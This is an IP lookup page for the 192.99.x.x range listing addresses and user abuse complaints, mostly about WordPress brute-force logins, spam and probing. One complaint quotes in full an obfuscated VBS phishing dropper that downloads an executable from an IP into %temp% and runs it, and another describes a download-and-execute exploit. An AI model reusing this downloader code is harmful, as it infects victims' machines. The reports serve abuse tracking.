IP Address Lookup

192.99.x.x IP Lookup - Canada

IP addresses in the 192.99.0-63.x range (192.99.0.0 - 192.99.255.255 network). 19 abuse reports have been filed for IPs in this range.

  • 192.99.43.15, 192.99.29.48, 192.99.2.96, 192.99.48.4, 192.99.26.59, 192.99.56.253
  • 192.99.4.225, 192.99.0.111, 192.99.53.34, 192.99.32.95, 192.99.4.4, 192.99.45.247
  • 192.99.10.62, 192.99.31.186, 192.99.5.235, 192.99.32.244, 192.99.4.119, 192.99.28.234
  • 192.99.2.89, 192.99.15.150, 192.99.1.67, 192.99.36.173, 192.99.34.175, 192.99.11.82
  • 192.99.28.27, 192.99.47.103, 192.99.29.78, 192.99.30.189, 192.99.61.232, 192.99.59.222
  • 192.99.57.200, 192.99.60.137, 192.99.24.112, 192.99.58.23, 192.99.23.48, 192.99.13.25
  • 192.99.23.200, 192.99.62.126, 192.99.27.111, 192.99.11.148, 192.99.18.14, 192.99.13.163
  • 192.99.3.222, 192.99.50.57, 192.99.40.16, 192.99.63.164, 192.99.19.183, 192.99.63.10
  • 192.99.16.158, 192.99.57.217, 192.99.59.76, 192.99.22.76, 192.99.56.164, 192.99.26.22
  • 192.99.0.98, 192.99.54.118, 192.99.50.232, 192.99.53.184, 192.99.13.228, 192.99.0.78
  • 192.99.33.250, 192.99.19.35, 192.99.26.25, 192.99.48.222, 192.99.23.16, 192.99.5.230
  • 192.99.10.31, 192.99.57.212, 192.99.4.224, 192.99.23.39, 192.99.3.86, 192.99.46.52
  • 192.99.35.3, 192.99.14.217, 192.99.61.169, 192.99.3.213, 192.99.58.196, 192.99.57.144
  • 192.99.44.144, 192.99.22.81, 192.99.11.189, 192.99.47.88, 192.99.16.205, 192.99.2.59
  • 192.99.18.205, 192.99.42.13, 192.99.63.66, 192.99.61.228, 192.99.43.158, 192.99.2.157
  • 192.99.30.185, 192.99.53.48, 192.99.7.21, 192.99.42.200, 192.99.35.172, 192.99.24.85
  • 192.99.24.239, 192.99.49.82, 192.99.4.104, 192.99.31.166, 192.99.32.214, 192.99.49.123
  • 192.99.47.186, 192.99.22.218, 192.99.59.56, 192.99.19.160, 192.99.39.141, 192.99.20.84
  • 192.99.47.239, 192.99.50.247, 192.99.40.134, 192.99.20.0, 192.99.9.33, 192.99.40.22
  • 192.99.28.190, 192.99.37.186, 192.99.27.9, 192.99.41.22, 192.99.63.168, 192.99.0.141
  • 192.99.7.250, 192.99.54.169, 192.99.56.182, 192.99.43.171, 192.99.19.248, 192.99.19.254
  • 192.99.56.88, 192.99.52.77, 192.99.40.244, 192.99.51.202, 192.99.42.146, 192.99.20.109
  • 192.99.57.43, 192.99.57.165, 192.99.23.231, 192.99.46.44, 192.99.40.42, 192.99.5.151
  • 192.99.29.17, 192.99.52.223, 192.99.33.13, 192.99.6.17, 192.99.22.53, 192.99.9.115
  • 192.99.30.166, 192.99.44.90, 192.99.46.161, 192.99.14.235, 192.99.50.224, 192.99.2.235
  • 192.99.12.174, 192.99.17.229, 192.99.4.100, 192.99.35.4, 192.99.36.218, 192.99.14.173
  • 192.99.3.145, 192.99.58.31, 192.99.62.82, 192.99.10.182, 192.99.33.249, 192.99.16.166
  • 192.99.9.65, 192.99.23.24, 192.99.50.147, 192.99.39.75, 192.99.16.128, 192.99.30.78
  • 192.99.26.81, 192.99.24.245, 192.99.39.111, 192.99.26.194, 192.99.44.96, 192.99.61.69
  • 192.99.0.13, 192.99.49.13, 192.99.38.128, 192.99.58.213, 192.99.49.76, 192.99.55.57
  • 192.99.8.46, 192.99.23.9, 192.99.43.89, 192.99.37.242, 192.99.21.31, 192.99.19.198
  • 192.99.11.123, 192.99.33.57, 192.99.21.10, 192.99.17.40, 192.99.19.44, 192.99.62.197
  • 192.99.31.52, 192.99.41.209, 192.99.52.123, 192.99.32.97, 192.99.49.57, 192.99.51.248
  • 192.99.23.245, 192.99.12.196, 192.99.56.175, 192.99.4.2, 192.99.28.9, 192.99.25.77
  • 192.99.39.69, 192.99.56.102, 192.99.15.210, 192.99.48.147, 192.99.63.231, 192.99.32.210
  • 192.99.41.66, 192.99.1.218, 192.99.45.95, 192.99.54.126, 192.99.33.171, 192.99.61.144
  • 192.99.47.111, 192.99.29.72, 192.99.61.163, 192.99.42.172, 192.99.41.178, 192.99.18.140
  • 192.99.1.86, 192.99.55.56, 192.99.13.156, 192.99.37.140, 192.99.61.134, 192.99.26.129
  • 192.99.61.178, 192.99.10.192, 192.99.63.191, 192.99.33.145, 192.99.45.38, 192.99.59.20
  • 192.99.57.22, 192.99.62.148, 192.99.54.16, 192.99.4.89, 192.99.38.68, 192.99.30.73
  • 192.99.59.211, 192.99.34.158, 192.99.35.134, 192.99.16.47, 192.99.56.89, 192.99.45.143
  • 192.99.31.247, 192.99.13.61, 192.99.56.184, 192.99.13.137, 192.99.56.48, 192.99.16.197
  • 192.99.21.84, 192.99.2.104, 192.99.12.30, 192.99.60.85

Showing 256 of 16,384 IPs (192.99.43.15 to 192.99.60.85). Use the pagination below to browse all IPs in this range, or look up any specific IP directly.

Most recent complaints

192.99.0.98

Complaint by Neil :

This IP address is trying to hack into my website.

Reported on: 25th, Feb. 2021

192.99.31.194

Complaint by Anonymous :

attack mail server

Reported on: 3rd, Mar. 2016

192.99.11.122

Complaint by ad :

Hi

Reported on: 28th, Dec. 2015

192.99.11.81

Complaint by RH :

Tried to log in by brut force into my wordpress web

Reported on: 7th, Dec. 2015

192.99.19.178

Complaint by Angelo Steffenel :

Inside a phishing email there is a VBS script that downloads a file from this address and executes it. Script: Dim KDhnYBYFkCfnMjsyxDhPb KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq" If KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq" Then End If WScript.Sleep 4000 Dim IDYVbPrSxIOQmVHlhhrMe IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY" If IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY" Then End If Dim pWLDnIbAxcaFeCLyYVoMl pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj" If pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj" Then End If path = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%") Dim jbOpkfGOcOSqeMWQsOtIV jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam" If jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam" Then End If path = path & "\" Dim bPKzPmlstEgupMlzTGcLE bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM" If bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM" Then End If URL = "http://192.99.19.178/xdde.exe" Dim UBuVzItKFfJxfYuSyMXRp UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu" If UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu" Then End If DJ = "foyoun.exe" Dim GiTlDQmIBtHlTvWlSngxD GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB" If GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB" Then End If dim GH: Set GH = createobject("Microsoft.XMLHTTP") Dim oCvKtmDggbKnfwaqsfiHn oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz" If oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz" Then End If dim NJ: Set NJ = createobject("Adodb.Stream") Dim XYYujdiLRWsDGyQrMdTdI XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf" If XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf" Then End If GH.Open "GET", URL, False Dim noJDsEnwMRwvIuMKrDqsQ noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ" If noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ" Then End If GH.Send Dim lJfIDLwdMkgxsqlxCSqdl lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi" If lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi" Then End If Dim LvwsgIYDgarbKxryMxqEo LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ" If LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ" Then End If with NJ Dim sIEULnfeEkUwMezeyNsVj sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt" If sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt" Then End If .type = 1 '//binary Dim EfbFlmGxEemgogWpEexDs EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl" If EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl" Then End If .open Dim bVARHccOjqvnFoOVovgLe bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj" If bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj" Then End If .write GH.responseBody Dim ROuABfAUaQknyFlzXwkgu ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm" If ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm" Then End If .savetofile path & DJ, 2 '//overwrite Dim jBOqyenfPJuctlqaxUrJI jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq" If jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq" Then End If end with Dim zEzFClGHhilWxXYPejjuT zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN" If zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN" Then End If Dim zUeKUpPqPdbZxcuJwtsvA zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL" If zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL" Then End If file = path & DJ Dim WqltKUVZZcPQsSPXrAioP WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij" If WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij" Then End If Set WshShell = WScript.CreateObject("WScript.Shell") Dim srTHesvHyvDBrVUtHvBgL srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ" If srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ" Then End If WshShell.Run chr(34) & file & chr(34)

Reported on: 13th, Jan. 2015

192.99.6.106

Complaint by Anonymous :

This address is used in an exploit, Attempts to download http://192.99.6.106/ddd and execute it with Perl.

Reported on: 3rd, Dec. 2014

192.99.12.128

Complaint by mj :

A host, 192.99.12.128, has been locked out of the WordPress site due to too many attempts to access a file that does not exist.

Reported on: 20th, Jun. 2014

192.99.12.128

Complaint by George :

This IP was searching for backup files in the root of sites using common patterns.

Reported on: 17th, Jun. 2014

192.99.7.177

Complaint by Sebastian :

Received Spam to my wordpress comments

Reported on: 26th, May. 2014

192.99.11.81

Complaint by Anonymous :

Repeatedly trying to log in to my WordPress account.

Reported on: 18th, May. 2014

192.99.11.81

Complaint by Anonymous :

Has been trying brute force on my site using "Admin".

Reported on: 14th, May. 2014

192.99.11.81

Complaint by j wells :

attempted hack on my wordpress site from this ip

Reported on: 26th, Apr. 2014

192.99.11.81

Complaint by Anonymous :

Our site is getting hammered too.. Using "mysite" as the username thinking you might use that for your admin or user log in.

Reported on: 26th, Apr. 2014

192.99.11.81

Complaint by DarkMatter :

I get the same. This "bot" or whatever it is has been hammering against my site (good luck with that) for the last 4 days and coming from the same 192.99.11.81. Be advised its trying the domainname with out the TLD extension as a username so if your site is mysite.com he's using "mysite" as the username thinking you might use that for your admin or user log in.

Reported on: 3rd, Apr. 2014

192.99.11.81

Complaint by Joe Blow :

Keeps trying to hack my site. Coming in from "hacker90.org." ********.

Reported on: 2nd, Apr. 2014

192.99.11.81

Complaint by J Humphrey :

This IP address was found repeatedly trying to log onto my website as admin using brute force password guessing. 29 March 2016 9:00 CET

Reported on: 29th, Mar. 2014

192.99.12.128

Complaint by Rudi Lehnert :

This guy tried to hack my blog-O-rama Admin Area: http://blogorama.eisbrecher.net 9 ungültige Anmeldeversuche (3 Sperrung(en)) von IP: 192.99.12.128 Letzter Anmeldeversuch erfolgte mit dem Benutzernamen: ConcepcionBerna IP wurde gesperrt für 9000 Stunden.

Reported on: 28th, Feb. 2014

192.99.12.128

Complaint by HB :

SPAMMERS and attack on registration

Reported on: 16th, Jan. 2014

192.99.2.193

Complaint by Rudi Lehnert :

This guy tried to hack my blog-O-rama Admin Area: http://blogorama.eisbrecher.net 9 ungültige Anmeldeversuche (3 Sperrung(en)) von IP: 192.99.2.193 Letzter Anmeldeversuch erfolgte mit dem Benutzernamen: WilliamBraxton IP wurde gesperrt für 9000 Stunden.

Reported on: 9th, Nov. 2013